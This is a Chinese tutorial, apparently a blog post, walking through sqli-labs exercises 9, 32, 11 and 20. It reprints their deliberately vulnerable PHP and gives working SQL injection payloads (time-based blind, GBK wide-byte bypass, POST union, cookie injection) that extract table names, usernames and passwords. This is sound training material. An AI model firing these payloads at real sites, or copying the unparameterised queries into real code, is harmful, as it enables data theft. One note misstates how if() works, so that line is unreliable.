SQL注入（下）

SQL注入（下）

前言

个人观点，若有误请指教

Less-9

源码

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-9 Blind- Time based- Single Quotes- String</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">


<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

// take the variables
if(isset($_GET['id']))
{
    
    
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity 


$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
    
    
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
    	echo "</font>";
  	}
	else 
	{
    
    
	
	echo '<font size="5" color="#FFFF00">';
	echo 'You are in...........';
	//print_r(mysql_error());
	//echo "You have an error in your SQL syntax";
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';	
	
	}
}
	else {
    
     echo "Please input the ID as parameter with numeric value";}

?>
</font> </div></br></br></br><center>
<img src="../images/Less-9.jpg" /></center>
</body>
</html>

实操

获得数据库长度

sql.test/less-9/?id= 1’ and if((length(database()))=8, 1, sleep(5)) --+
注解：当长度正确时，页面很快就加载出来了，否则将休眠5秒（很慢）。if函数的用法
获得数据库名称

sql.test/less-9/?id= 1’ and if((ascii(substr(database(),1,1)))=115, 1, sleep(5)) --+
注解：这里可以使用BurpSuite工具破解
获得数据表的数量
sql.test/less-9/?id= 1’ and if((select count(table_name) from information_schema.tables where table_schema=database()) =4, 1, sleep(5)) --+
获得数据表名长度

sql.test/less-9/?id= 1’ and if((select length(table_name) from information_schema.tables where table_schema=database() limit 0, 1) =6, 1, sleep(5)) --+
注解：以上是只获得第一个表名长度，如果要获得其他表名长度，修改limit后面的数字即可
获得数据表名称

sql.test/less-9/?id= 1’ and if((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0, 1),1,1)))=101, 1, sleep(5)) --+
注解：这里可以使用BurpSuite工具破解，获得database（）数据库中的第一个表名。
获得数据表的字段总数

sql.test/less-9/?id= 1’ and if((select count(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME=‘users’ and TABLE_SCHEMA=‘security’) = 3, 1, sleep(5)) --+
注解：获得user表的字段总数
获得数据表的字段长度
sql.test/less-9/?id= 1’ and if((select length(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME=‘users’ and TABLE_SCHEMA=‘security’ limit 0,1) = 2 , 1, sleep(5)) --+
注解：获得user表第一个字段的长度。
获得表的字段名字

sql.test/less-9/?id= 1’ and if((ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=‘users’ and TABLE_SCHEMA=‘security’ limit 0,1), 1, 1))) = 105 , 1, sleep(5)) --+
注解：这里可以使用BurpSuite工具破解，获得user表第一个字段的名字（根据其长度）。
获得字段数据内容长度

sql.test/less-9/?id= 1’ and if( (select length(username) from users limit 0,1) = 4 , 1, sleep(5)) --+
注解：获得users表username字段的第一条内容长度。
获得字段数据内容

sql.test/less-9/?id= 1’ and if((ascii(substr((select username from users limit 0,1), 1, 1))) = 68, 1, sleep(5)) --+
注解：这里可以使用BurpSuite工具破解，获得users表username字段的第一条内容（根据其长度）。
个人总结：
- 该注入为盲注中的时间注入，该注入的回响都一样（查询内容为空或者查询语句有错误或者查询内容有值），所以只能通过回响的时间来判断。

Less-32

源码

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-32 **Bypass addslashes()**</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="5" color="#00FF00">


<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");

function check_addslashes($string)
{
    
    
    $string = preg_replace('/'.preg_quote('\\').'/', "\\\\\\", $string);          //escape any backslash
    $string = preg_replace('/\'/i', '\\\'', $string);                               //escape single quote with a backslash
    $string = preg_replace('/\"/', "\\\"", $string);                                //escape double quote with a backslash
      
    
    return $string;
}

// take the variables 
if(isset($_GET['id']))
{
    
    
$id=check_addslashes($_GET['id']);
//echo "The filtered request is :" .$id . "<br>";

//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity 

mysql_query("SET NAMES gbk");
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
echo $sql;
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
    
    
  	echo '<font color= "#00FF00">';	
  	echo 'Your Login name:'. $row['username'];
  	echo "<br>";
  	echo 'Your Password:' .$row['password'];
  	echo "</font>";
  	}
	else 
	{
    
    
	echo '<font color= "#FFFF00">';
	print_r(mysql_error());
	echo "</font>";  
	}
}
	else {
    
     echo "Please input the ID as parameter with numeric value";}
        
        

?>
</font> </div></br></br></br><center>
<img src="../images/Less-32.jpg" />
</br>
</br>
</br>
</br>
</br>
<font size='4' color= "#33FFFF">
<?php

function strToHex($string)
{
    
    
    $hex='';
    for ($i=0; $i < strlen($string); $i++)
    {
    
    
        $hex .= dechex(ord($string[$i]));
    }
    return $hex;
}
echo "Hint: The Query String you input is escaped as : ".$id ."<br>";
echo "The Query String you input in Hex becomes : ".strToHex($id). "<br>";

?>
</center>
</font> 
</body>
</html>

实操

是否存在宽字节注入

http://sql.test/Less-32/?id=%df’
注解：在调用sql前，%df’ ⇒ %df/’ ==>汉字’，这样导致’提前闭合，而后面的’又没有被注释掉，这里报错证明存在宽字节注入。
获得当前数据库名称

http://sql.test/Less-32/?id=%df’ union select 1, 2, database() %23
获得数据库的表数

http://sql.test/Less-32/?id=%df’ union select 1, 2, (select count(table_name) from information_schema.tables where table_schema=database())%23
获得表名

http://sql.test/Less-32/?id=%df’ union select 1, 2, (select table_name from information_schema.tables where table_schema=database() limit 3, 1)%23
获得数据表的字段数

http://sql.test/Less-32/?id=%df’ union select 1, 2, (select count(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME=((select table_name from information_schema.tables where table_schema=database() limit 3, 1)) and TABLE_SCHEMA=database()) %23
获得数据表的字段名

http://sql.test/Less-32/?id=%df’ union select 1, 2, (select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=(select table_name from information_schema.tables where table_schema=database() limit 3, 1) and TABLE_SCHEMA=database() limit 0,1) %23
获得数据内容

http://sql.test/Less-32/?id=%df’ union select id, username, password from users limit 0, 1 %23
注意：每次只能查找三个字段，如有多于三的字段应该分多次查找。
个人总结：
- 该注入为宽字节注入，其使用的条件是数据库必须使用gbk编码（2个字节为一个汉字的特性），而该php源码把输入的’转义成\'再调用sql语句，导致’提前被闭合。utf-8（3个字节为一个汉字的特性）。

Less-11

源码

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
	<title>Less-11- Error Based- String</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br></div>

<div  align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;">

<div style="padding-top:10px; font-size:15px;">
 

<!--Form to post the data for sql injections Error based SQL Injection-->
<form action="" name="form1" method="post">
	<div style="margin-top:15px; height:30px;">Username : &nbsp;&nbsp;&nbsp;
	    <input type="text"  name="uname" value=""/>
	</div>  
	<div> Password  : &nbsp;&nbsp;&nbsp;
		<input type="text" name="passwd" value=""/>
	</div></br>
	<div style=" margin-top:9px;margin-left:90px;">
		<input type="submit" name="submit" value="Submit" />
	</div>
</form>

</div></div>

<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">
<font size="6" color="#FFFF00">





<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    
    
	$uname=$_POST['uname'];
	$passwd=$_POST['passwd'];

	//logging the connection parameters to a file for analysis.
	$fp=fopen('result.txt','a');
	fwrite($fp,'User Name:'.$uname);
	fwrite($fp,'Password:'.$passwd."\n");
	fclose($fp);


	// connectivity 
	@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
	echo $sql;
                echo "<br/>";
	$result=mysql_query($sql);
	$row = mysql_fetch_array($result);

	if($row)
	{
    
    
  		//echo '<font color= "#0000ff">';	
  		
  		echo "<br>";
		echo '<font color= "#FFFF00" font size = 4>';
		//echo " You Have successfully logged in\n\n " ;
		echo '<font size="3" color="#0000ff">';	
		echo "<br>";
		echo 'Your Login name:'. $row['username'];
		echo "<br>";
		echo 'Your Password:' .$row['password'];
		echo "<br>";
		echo "</font>";
		echo "<br>";
		echo "<br>";
		echo '<img src="../images/flag.jpg"  />';	
		
  		echo "</font>";
  	}
	else  
	{
    
    
		echo '<font color= "#0000ff" font size="3">';
		//echo "Try again looser";
		print_r(mysql_error());
		echo "</br>";
		echo "</br>";
		echo "</br>";
		echo '<img src="../images/slap.jpg" />';	
		echo "</font>";  
	}
}

?>


</font>
</div>
</body>
</html>

实操

是否存在注入点

www’ or 1 = 1 #
注解：有回响（Your Login name:Dumb；Your Password:Dumb），证明存在post注入。
获得回响点

www’ union select 1, 2 #
获得当前数据库名

www’ union select 1, database() #
获得数据库的表数

www’ union select 1, (select count(table_name) from information_schema.tables where table_schema=database()) #
获得数据表名

www’ union select 1,(select table_name from information_schema.tables where table_schema=database() limit 3, 1) #
获得查询user表语句结果集的字段数
www’ or 1 = 1 order by 2 #

-获得表的字段数

www’ union select 1, (select count(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME=“users” and TABLE_SCHEMA=database()) #
获得表的字段名

www’ union select 1,(select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=“users” and TABLE_SCHEMA=database() limit 0,1) #
获得表的数据

www’ union select username,password from users limit 1,1 #
注解：每次只能查询一条记录中的两个字段。
个人总结：
- 在输入时–（注释）前后都要有一个空格，而#（注释）前面需要一个空格（后面没有特别要求）。
- 注意在输入框中%23不代表注释。

Less-20

源码

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<title>Less-20 Cookie Injection- Error Based- string</title>
</head>

<body bgcolor="#000000">
<?php
//including the Mysql connect parameters.
	include("../sql-connections/sql-connect.php");
	error_reporting(0);
//没有cookie，首次登陆时
if(!isset($_COOKIE['uname']))
	{
    
    
	//including the Mysql connect parameters.
	include("../sql-connections/sql-connect.php");

	echo "<div style=' margin-top:20px;color:#FFF; font-size:24px; text-align:center'> Welcome&nbsp;&nbsp;&nbsp;<font color='#FF0000'> Dhakkan </font><br></div>";
	echo "<div  align='center' style='margin:20px 0px 0px 510px;border:20px; background-color:#0CF; text-align:center;width:400px; height:150px;'>";
	echo "<div style='padding-top:10px; font-size:15px;'>";
 

	echo "<!--Form to post the contents -->";
	echo '<form action=" " name="form1" method="post">';

	echo ' <div style="margin-top:15px; height:30px;">Username : &nbsp;&nbsp;&nbsp;';
	echo '   <input type="text"  name="uname" value=""/>  </div>';
  
	echo ' <div> Password : &nbsp; &nbsp; &nbsp;';
	echo '   <input type="text" name="passwd" value=""/></div></br>';	
	echo '   <div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>';

	echo '</form>';
	echo '</div>';
	echo '</div>';
	echo '<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">';
	echo '<font size="3" color="#FFFF00">';
	echo '<center><br><br><br>';
	echo '<img src="../images/Less-20.jpg" />';
	echo '</center>';




	
function check_input($value)
	{
    
    
	if(!empty($value))
		{
    
    
		$value = substr($value,0,20); // truncation (see comments)
		}
		if (get_magic_quotes_gpc())  // Stripslashes if magic quotes enabled
			{
    
    
			$value = stripslashes($value);
			}
		if (!ctype_digit($value))   	// Quote if not a number
			{
    
    
			$value = "'" . mysql_real_escape_string($value) . "'";
			}
	else
		{
    
    
		$value = intval($value);
		}
	return $value;
	}


	
	echo "<br>";
	echo "<br>";
	
	if(isset($_POST['uname']) && isset($_POST['passwd']))
		{
    
    
	
		$uname = check_input($_POST['uname']);
		$passwd = check_input($_POST['passwd']);
		
	

		
		$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
		$result1 = mysql_query($sql);
		$row1 = mysql_fetch_array($result1);
		$cookee = $row1['username'];
			if($row1)
				{
    
    
				echo '<font color= "#FFFF00" font size = 3 >';
				setcookie('uname', $cookee, time()+3600);	
				header ('Location: index.php');
				echo "I LOVE YOU COOKIES";
				echo "</font>";
				echo '<font color= "#0000ff" font size = 3 >';			
				//echo 'Your Cookie is: ' .$cookee;
				echo "</font>";
				echo "<br>";
				print_r(mysql_error());			
				echo "<br><br>";
				echo '<img src="../images/flag.jpg" />';
				echo "<br>";
				}
			else
				{
    
    
				echo '<font color= "#0000ff" font size="3">';
				//echo "Try again looser";
				print_r(mysql_error());
				echo "</br>";			
				echo "</br>";
				echo '<img src="../images/slap.jpg" />';	
				echo "</font>";  
				}
			}
		
			echo "</font>";  
	echo '</font>';
	echo '</div>';

}
//有cookie
else
{
    
    


	//打印相关信息
	if(!isset($_POST['submit']))
		{
    
    
			
			$cookee = $_COOKIE['uname'];
			$format = 'D d M Y - H:i:s';
			$timestamp = time() + 3600;
			echo "<center>";
			echo '<br><br><br>';
			echo '<img src="../images/Less-20.jpg" />';
			echo "<br><br><b>";
			echo '<br><font color= "red" font size="4">';	
			echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
			echo "</font><br>";	
			echo '<font color= "cyan" font size="4">';	
			echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];			
			echo "</font><br>";			
			echo '<font color= "#FFFF00" font size = 4 >';
			echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br>";
			echo '<font color= "orange" font size = 5 >';			
			echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
			
			
			echo "<br></font>";
			$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
			$result=mysql_query($sql);
			if (!$result)
  				{
    
    
  				die('Issue with your mysql: ' . mysql_error());
  				}
			$row = mysql_fetch_array($result);
			if($row)
				{
    
    
			  	echo '<font color= "pink" font size="5">';	
			  	echo 'Your Login name:'. $row['username'];
			  	echo "<br>";
				echo '<font color= "grey" font size="5">';  	
				echo 'Your Password:' .$row['password'];
			  	echo "</font></b>";
				echo "<br>";
				echo 'Your ID:' .$row['id'];
			  	}
			else	
				{
    
    
				echo "<center>";
				echo '<br><br><br>';
				echo '<img src="../images/slap1.jpg" />';
				echo "<br><br><b>";
				//echo '<img src="../images/Less-20.jpg" />';
				}
			echo '<center>';
			echo '<form action="" method="post">';
			echo '<input  type="submit" name="submit" value="Delete Your Cookie!" />';
			echo '</form>';
			echo '</center>';
		}
	//删除cookie
	else
		{
    
    
		echo '<center>';
		echo "<br>";
		echo "<br>";
		echo "<br>";
		echo "<br>";
		echo "<br>";
		echo "<br>";
		echo '<font color= "#FFFF00" font size = 6 >';
		echo " Your Cookie is deleted";
				setcookie('uname', $row1['username'], time()-3600);
				header ('Location: index.php');
		echo '</font></center></br>';
		
		}		


			echo "<br>";
			echo "<br>";
			//header ('Location: main.php');
			echo "<br>";
			echo "<br>";
			
			//echo '<img src="../images/slap.jpg" /></center>';
			//logging the connection parameters to a file for analysis.	
		$fp=fopen('result.txt','a');
		fwrite($fp,'Cookie:'.$cookee."\n");
	
		fclose($fp);
	
}
?>

</body>
</html>

注意：header只会转发http报文头，即用户名密码之类的都会不复存在。

实操

由于该源码对输入的账号和密码进行了截断（20个字符）以及转义，不容易进行注入；
但对于产生的cookie并没有进行其他的过滤操作，所以可以通过Burp进行代理，篡改中间的报文（第二次的请求报文）。扩充了解：Burp suite之拦截响应报文

获得后台查询语句的结果集字段数

注解：没有报错，证明字段数为3
获得回响点

’ union select 1,2,3
注解：可以不用加(limit 0, 1),因为查询结果只有一条记录，而mysql_fetch_array函数每次只取一条
获得当前数据库名
获得当前数据库的表数
获得数据库表名
获得表的字段数
获得字段名
获得数据

个人总结：
-该注入为cookie注入，目前来说，只有知道其中一个正确的账号和密码才能进行注入，以至于获得全部的信息（只根据上面的源码来讲）。

URL中特殊字符转义编码

字符	URL编码值
空格	%20
"	%22
#	%23
%	%25
&	%26
(	%28
)	%29
+	%2B
,	%2C
/	%2F
:	%3A
;	%3B
<	%3C
=	%3D
>	%3E
?	%3F
@	%40
\	%5C
\|	%7C

MySQL函数

①group_concat（）一般搭配group by使用（具体上网查），但如果没有group by，则直接将那一个字段所有的值合拼（以，分隔）；
②user（）返回MySQL连接的当前用户名和主机名；
③information_schema数据库，是mysql安装之后自带的数据库，其里面保存着所有数据库，而其table表保存所有数据库的表名。
④Lenghth() 返回字符串的长度
⑤Ascii() 返回字符串的AScii码
⑥Substr(x,num1,num2),从num1开始截取字符串x，截取数量为num2
⑦sleep(x) 将程序执行延迟x秒
⑧if(exp1, xep2, xep3) 如果第一个语句/条件正确，他就执行xep2代码，否则就执行xep2代码

目录

前言